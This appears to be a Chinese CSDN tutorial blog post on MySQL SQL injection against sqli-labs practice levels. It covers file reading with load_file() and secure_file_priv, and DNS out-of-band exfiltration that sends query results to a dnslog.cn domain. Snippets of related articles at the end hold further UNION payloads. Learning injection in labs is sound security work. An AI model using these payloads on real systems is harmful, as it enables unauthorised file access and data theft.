SQL注入——mysql数据库之读写文件,代外攻击

最新推荐文章于 2023-10-01 13:53:23 发布
最新推荐文章于 2023-10-01 13:53:23 发布
阅读量626 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Night_time/article/details/105962945
版权

一,读文件

1,读文件函数:load_file() 只能用来读取文件不能读取目录 并且(文件路径要使用    \\  [双斜线]或者  / [反斜线]   )

2,读写文件权限

secure_file_priv=       //对读写文件没有限制

secure_file_priv=NULL      //不能进行读写文件

secure_file_priv=“D:/software/phpStudy/PHPTutorial/MySQL/data/“  ps:只能在固定文件夹下进行读写文件

3,读文件实例:以sqli-labs-master第二个为例:

注入语句:

union select 1,2,load_file("C:\\Windows\\System32\\drivers\\etc\\hosts") -- -

二,代外攻击

Load_file()load_file不仅可以用来读取本地敏感文件还可以用来读取网络上的文件

  dnslog.cn(网站):根据DNS浏览记录产生回显

注意:当回显结果中夹杂着特殊符号的时候,使用十六进制编码的形式进行绕过

代外攻击基础语句:

and select load_file(concat(“\\\\”,hex(user()), “. 8bzoqi.dnslog.cn\\a.txt”)) -- -

在代外攻击时不能使用group_concat()函数,好使用limit()函数

实例:

代外攻击主要解决了,在注入过程中没有显示位,使用dnsdnslog.cn网站的特性来让我们的注入语句产生回显

下面以sqli-labs-master第八关为例:

第一步:获取一个域名

第二步:

准备语句:

and load_file(concat("\\\\",(select schema_name from information_schema.schemata limit 0,1),".li17a4.dnslog.cn\\a.txt")) -- -

ps:li17a4.dnslog.cn是复制下来的域名
    a.txt是随便写的一个不存在的文件

注意:li17a4.dnslog.cn 域名前加 .

三,写文件

写文件常用函数:

         into outfile()

         into dumpfile()

写文件权限问题:secure_file_priv=

实列:

 

 

技术无罪,向阳而生,请别因为技术而走向深渊!!

Night_time
关注
SQL注入 | mysql写入文件 | 读取文件
JacobTsang的博客
10-11 2978
mysql 新版本下secure-file-priv字段 : secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。 ure_file_priv的值为null ,表示限制mysqld 不允许导入|导出。 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生...
sql注入——读写文件
cxrpty的博客
02-10 3413
读写文件受到权限影响,权限是:secure_file_priv,权限的位置在数据库的配置文件my.ini中 1.secure_file_priv= 代表对文件读写没有限制 2.secure_file_priv=NULL 代表不能进行文件读写 3.secure_file_priv=d:/phpstudy/mysql 代表只能对该路径下文件进...
sql注入之——读写文件,带外攻击
wsnbbz的博客
02-10 1579
1.开启读文件权限 在my.ini加上secure_file_priv= secure_file_priv=代表对文件读写没有限制 secure_file_priv=NULL代表不能进行文件读写 secure_file_priv=d:/…代表只能对改路径下文件进行读写 2.读文件函数: load_file(); 语句: ?id=-1 union select 1,load_file(“d:\...
MySQL注入读写文件、HTTP头中的SQL注入和cookie注入
weixin_45735361的博客
02-21 457
MySQL注入读写文件 MySQL数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(前提是权限足够) 读取前提: 1.用户权限足够高,尽量具有root权限 2.secure_file_priv不为null 读取文件内容 http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,load_file('文件路径'...
2,sql注入 , 读文件和写文件
qq_41860876的博客
10-13 787
任务091:手动漏洞挖掘-SQL注入 这个是接着上一个1,SQL注入,查看服务器系统,拿到账号密码。写的 开始实验靶机metasploitable-linux-2.0.0 利用一个函数进行读取系统文件 下面都是用burp进行发送的请求 发送的请求是1234 使用burp看看请求的内容 在burp工具里发送到Repeater模块里 在这里面原始数据直接可以看见发的信息 双击就能修改里面的1234...
Web安全第7讲 - MySQL注入读写文件、HTTP头中的SQL注入、绕过SQL注入
Yauger的博客
02-20 441
一、MySQL注入读写文件 1.1 查看是否有权限在mysql读写文件 读取前提: 1.用户权限足够高,尽量具有root权限 2.secure_file_priv不为null 1.1.1 打开命令行查看 show global variables like 'secure_file_priv'; 1.1.2 打开mysql-ini 1.1.3 在最后添加,保存,并重启mysql服务 se...
数据库——玩转SQL语句(以MySQL为例)
12-14
学习SQL的进阶阶段还包括理解数据库设计、索引原理、性能优化、安全性(如防止SQL注入)以及高级话题如分布式数据库读写分离、主从复制等。这些内容对于数据库管理员和开发人员来说至关重要,能有效提升数据库系统...
【小迪安全day13】WEB漏洞——SQL注入MYSQL注入
RichUee的博客
12-05 1357
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
mysql数据库结课论文——小知识点.docx
11-25
对于MySQL数据库,需要进行性能测试,评估系统的读写速度、并发处理能力,以及在高负载下的稳定性。同时,安全性测试也是必不可少的,包括检查SQL注入漏洞,设置合适的访问权限,以及定期备份和恢复策略,以防止数据...
sql注入————ctfshowsql注入
qq_45655564的博客
06-07 1933
web171 -1’ union select 1,2,password from ctfshow_web.ctfshow_user–+ web172 -1’ union select 2,password from ctfshow_user2–+ web173 -1’ union select 1,2,password from ctfshow_user3–+ web174 -1’ union select ‘a’,replace(replace(replace(replace(replace(repla
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
Mysql注入中的outfile、dumpfile、load_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下 翻译一下就是 其中当参数 secure_file_priv 为空时,对导入导出无限制 当值为一个指定的目录时,只能向指定的目录导入导出 当值被设置为NULL时,禁止导
MySQL文件远程存储_本地MySQL数据库要访问远程MySQL数据库的表中的数据的实现
weixin_39657521的博客
02-28 114
1.实现基本思路:借助MySQL的federated 存储引擎实现federated 存储引擎简单介绍 :federated 是其中一个专门针对远程数据库的实现。一般情况下在本地数据库中建表会在数据库目录中生成相应的表定义文件,并同时生成相应的数据文件。但通过federated 引擎创建的表只是在本地有表定义文件,数据文件则存在于远程数据库中2.查看当前数据库服务是否支持 federated...
SQL注入攻击
调皮的写代码
06-07 789
一、SQL注入攻击
13.SQL漏洞-高低权限注入&敏感文件读写
mingyqf的博客
03-20 4597
思维导图 【高权限注入及低权限注入】 高用户权限和低用户权限的不同 网站A=数据库A=管理员用户A 存在sql注入漏洞 Root 前提是具有高权限 网站B=数据库B=管理员用户B 没有存在sql注入漏洞 网站C=数据库C=管理员用户C 跨库查询思路 用高权限用户来跨数据库查询 1.获取所有数据库名 http://192.168.80.140/sqlilabs/Less-2/?id=1 and 1=2 union select 1,group_concat(schema_name),3 from
mysql带外_【技术分享】MySQL带外攻击(含演示视频)
weixin_35252187的博客
02-02 317
Brexit预估稿费:180RMB投稿方式:发送邮件至 linwei#360.cn ,或登陆网页版在线投稿概述关于MSSQL和所有的这一切都只在Windows环境下的MySQL中有可能实现。什么是带外注入?这些攻击涉及通过除服务器以外的其它方式提取MySQL的限制条件MySQL中存在一个全局系统变量secure_file_priv。这个变量用来限制数据导入和导出操作的影响,例如由LOAD DA...
【网络安全---sql注入(2)】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。
最新发布
m0_67844671的博客
10-01 2179
sql注入】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来写入文件读取文件。通过SQL输入来注入木马来getshell等,讲解了比较详细的过程;
mysql常用注入函数
u014421914的博客
01-16 317
常用函数与逻辑运算 system_user()                              系统用户名 user()                                 &nb
MySQL注入中的常用函数
YouthBelief的博客
10-08 1096
MySQL注入中的常用函数 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 database() 数据库名 version() 数据库版本 @@datadir 数据库路径 @@basedir 数据库安装路径 @@version_compile_os 操作系统 count() 返回执行结果数量 select count(*) from users; concat() 没有分隔符的连接字符串 sel
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值